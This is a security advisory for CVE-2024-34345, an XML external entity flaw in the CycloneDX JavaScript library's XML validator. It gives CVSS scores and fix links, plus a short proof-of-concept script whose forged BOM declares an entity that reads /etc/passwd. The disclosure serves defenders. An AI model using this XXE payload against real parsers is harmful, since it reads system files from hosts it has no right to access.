CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
18.1%
XML External entity injections could be possible, when running the provided XML Validator on arbitrary input.
const {
Spec: { Version },
Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');
const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
<components>
<component type="library">
<name>testing</name>
<version>1.337</version>
<licenses>
<license>
<id>&xxe;</id>
</license>
</licenses>
</component>
</components>
</bom>`;
// validating this forged(^) input might lead to unintended behaviour
// for the fact that the XML external entity would be taken into account.
validator.validate(input).then(ve => {
console.error('validation error', ve);
});
This issue was fixed in @cyclonedx/[email protected]
.
Do not run the provided XML validator on untrusted inputs.
github.com/CycloneDX/cyclonedx-javascript-library
github.com/CycloneDX/cyclonedx-javascript-library/commit/5e5e1e0b9422f47d2de81c7c4064b803a01e7203
github.com/CycloneDX/cyclonedx-javascript-library/pull/1063
github.com/CycloneDX/cyclonedx-javascript-library/security/advisories/GHSA-38gf-rh2w-gmj7
nvd.nist.gov/vuln/detail/CVE-2024-34345
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
Confidence
Low
EPSS
Percentile
18.1%